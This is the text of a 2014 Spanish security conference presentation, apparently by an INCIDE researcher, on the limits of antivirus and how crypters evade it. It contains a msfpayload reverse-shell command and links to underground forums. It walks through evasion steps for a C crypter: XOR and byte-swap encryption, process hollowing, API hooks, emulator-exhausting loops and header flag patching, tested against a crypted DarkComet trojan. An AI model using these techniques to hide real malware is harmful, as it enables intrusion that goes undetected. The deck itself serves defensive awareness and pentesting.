La defensa del patrimonio tecnológico
frente a los ciberataques
10 y 11 de diciembre de 2014
Desmitificando el Antivirus
© 2014 Centro Criptológico Nacional
C/Argentona 20, 28023 MADRID
www.ccn-cert.cni.es
VIII JORNADAS STIC CCN-CERT
Abraham Pasamar Navarro
INCIDE
[email protected]
www.ccn-cert.cni.es
2
VIII JORNADAS STIC CCN-CERT
Índice
1.- Efectividad de los Antivirus
2.- Evasión de Antivirus
3.- Crypters
4.- C Crypter
5.- Demo
www.ccn-cert.cni.es
3
Antivirus
VIII JORNADAS STIC CCN-CERT
4
VIII JORNADAS STIC CCN-CERT
Antivirus
¿Nos protegen?
Sí
¿Hasta qué punto?
Todo lo que pueden
respecto de las ‘infecciones’ comunes
y lo que pueden ‘prever’
5
VIII JORNADAS STIC CCN-CERT
Ataque dirigido (APT)
Cybercriminales
¿Nos protegen?
No mucho
Las técnicas de ‘Detección’ de los AVs actualmente son insuficientes
Las defensas convencionales son insuficientes
6
Press
VIII JORNADAS STIC CCN-CERT
Brian Dye, CEO de Symantec
mayo 2014
Paradigma ha cambiado —> protección AV host/perimetro es insuficiente
7
AV’s: ¿Cómo funcionan?
VIII JORNADAS STIC CCN-CERT
Escanean binarios en el DISCO
¿Escanean en MEMORIA? algunos y poco :(
Buscan FIRMAS @ AV BBDD
Buscan TÉCNICAS MALICIOSAS (heurística)
EMULADOR (ejecución parcial) Tiempo Real
8
VIII JORNADAS STIC CCN-CERT
¿Por qué evadir AV’s?
BAD GUYS:
MALWARE = $$$$$$$
Botnets, Ransomware…
APT
GOOD GUYS:
Auditoría, Pentesting
9
VIII JORNADAS STIC CCN-CERT
¿Cómo evadir AV’s?
MALWARE suele ser una pieza compleja.
Encoders
Crypter es mucho más simple.
Packers
Permite proteger malware detectado.
msfpayload windows/shell/revers
e_tcp LHOST=192.168.1.75 LPORT=
4444 R | msfencode -c 5 -e x86/
shikata_ga_nai -x notepad.exe >
TIP:
notepad2.exe
REUTILIZACIÓN
Crypters
Método Público = MAL
Método Privado = BIEN
10
VIII JORNADAS STIC CCN-CERT
¿Información sobre Crypters?
Papers
“Abusing File Processing in Malware Detectors for Fun and Profit” (2012)
Suman Jana and Vitaly Shmatikov
The University of Texas at Austin
“Bypassing Anti-Virus Scanners” (2012)
InterNOT Security Team
“Hyperion:
Implementation of a PE-Crypter”(2012)
Christian Ammann
http://www.nullsecurity.net/
“One packer to rule them all: Empirical identification, comparison and
circumvention of current Antivirus detection techniques” (BruCON 2014)
Arne Swinnen,Alaeddine Mesbahi
11
Foros Underground
Manuales
Video-Tutoriales
Binarios
Código
Herramientas
Multi AV-Scanners
VIII JORNADAS STIC CCN-CERT
Enlaces:
http://www.indetectables.net
http://www.udtools.net
http://www.masters-hackers.info
http://www.level-23.biz
http://www.corp-51.net
http://www.underc0de.org
12
VIII JORNADAS STIC CCN-CERT
¿Qué es un Crypter?
Software creado para ocultar código malicioso y hacerlo indetectable a los antivirus (FUD)
CRYPTER
(Builder)
STUB
CRYPTER + STUB
exe
dll
recurso
MALWARE DETECTADO
XOR, RC4...
STUB
MALWARE CIFRADO
13
Builder/Stub
VIII JORNADAS STIC CCN-CERT
14
RunPE o Dynamic Forking
VIII JORNADAS STIC CCN-CERT
O
S
E
C
O
R
P
1
EP I
EP 2
O
S
E
C
O
R
P
2
BaseAddress 1
BaseAddress 2
+8
PEB
CreateProcess
(CREATE_SUSPENDED)
GetThreadContext
ReadFile
WriteProcessMemory
ResumeThread
SetThreadContext
EBX
EAX
15
VIII JORNADAS STIC CCN-CERT
Let’s code a C Crypter
Builder
MALWARE
C O N T E N E D O R
STUB
MALWARE CIFRADO
16
VIII JORNADAS STIC CCN-CERT
Let’s code a C Crypter
Builder
RUTINA DE CIFRADO
17
Let’s code a C Crypter
Builder
VIII JORNADAS STIC CCN-CERT
STUB+FIRMA+MALWARE CIFRADO
18
VIII JORNADAS STIC CCN-CERT
Let’s code a C Crypter
Stub
Localizar la FIRMA SEPARADORA
Descifrado (decryptbuffer=XOR[buffer])
19
VIII JORNADAS STIC CCN-CERT
Let’s code a C Crypter
Stub
Arrancar el proceso en memoria
(Dynamic Forking)
WriteProcessMemory ResumeThread
Estructuras cabecera ejecutable
CreateProcess (CREATE_SUSPEND)
20
VIII JORNADAS STIC CCN-CERT
Let’s code a C Crypter
Multi AV SCAN
TROJAN SERVER
(Darkcomet). SIN CRYPTER
TROJAN SERVER CRYPTED
(stub+[crypted Darkcomet])
21
Improving the Crypter
VIII JORNADAS STIC CCN-CERT
:( 13 Signatures … ¿ Qué podemos hacer ?
API HOOKS :)
GetProcAddress
22
VIII JORNADAS STIC CCN-CERT
Let’s Scan the Crypter
Multi AV SCAN
V1 - Original Crypter
V2 - API Hooks
23
Improving the Crypter
VIII JORNADAS STIC CCN-CERT
Añadiendo soporte para parámetros
main —> WinMain (nCmdLine)
24
VIII JORNADAS STIC CCN-CERT
Improving the Crypter
Cambiando la rutina de cifrado
XOR —> byte SWAP
25
VIII JORNADAS STIC CCN-CERT
Let’s scan the Crypter
Multi AV SCAN
V2 - API Hooks
V3 - Parameters & byte Swap
Ooohhh!!!
26
Improving the Crypter
FIRMAS indican HEURISTICA
VIII JORNADAS STIC CCN-CERT
¡¡¡ Matemos las firmas heurísticas !!!
Exhausting routine
Emulador —> Time Out
big loop
ANTIVIRUS EMULATOR
REAL TIME DETECTION
No es posible procesarlo en tiempo real
junk code
27
VIII JORNADAS STIC CCN-CERT
Let’s Scan the Crypter
Multi AV SCAN
V3 - Parameters & byte Swap
V4 - Exhausting Routine
OH YEAH !!!
28
VIII JORNADAS STIC CCN-CERT
Improving the Crypter
FIRMAS Estáticas
AVAST
Método de cifrado
Variante: SWAP +/- 1
29
VIII JORNADAS STIC CCN-CERT
Improving the Crypter
FIRMAS Estáticas
AVIRA
Firmas Cabecera (CRC/clusterización) - FLAGS Sección
CAMBIAMOS FLAGs
VALOR NO ESPERADO
30
VIII JORNADAS STIC CCN-CERT
Let’s scan the Crypter
Multi AV SCAN
V4 - Exhausting Routine
V6 - Cifrado+ & patch Flags
Awesome!!!
31
DEMO
VIII JORNADAS STIC CCN-CERT
Crypter en C (FUD)
Probarlo en un ataque
Ingeniería social (1 click)
Word + Macro (downloader)
Sandworm (0 clicks)
Ejecución FUD-Trojan en TR
32
VIII JORNADAS STIC CCN-CERT
Conclusiones
Bypass AVs es POSIBLE
—-> Compromiso INFORMACIÓN
Necesario prestar atención al COMPORTAMIENTO
Algunos elementos a considerar:
Perímetro (callbacks C&C)
SANDBOX
Contexto
33
VIII JORNADAS STIC CCN-CERT
IMÁGENES
Banco Imáges Propio
http://www.gratisography.com/
http://broadbandandsocialjustice.org/
Flickr, user: eviltomthai
Chiswick Chap - Own work
34
GRACIAS POR
SU ATENCIÓN
VIII JORNADAS STIC CCN-CERT
@apasamar
INCIDE
Avda. Diagonal, 640 6ª Planta
08017 Barcelona
[email protected]
http://www.incide.es
1NC1D3
http://www.incide.es/blog-incide/
http://www.youtube.com/incidetube
Companies > INCIDE - Investigación Digital
Tel./Fax. +34 932 546 277 / +34 932 546 314
35
E-Mails
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
Websites
www.ccn.cni.es
www.ccn-cert.cni.es
www.oc.ccn.cni.es
Síguenos en Linked in
Comentarios de: Desmitificando el AntiVirus (0)
No hay comentarios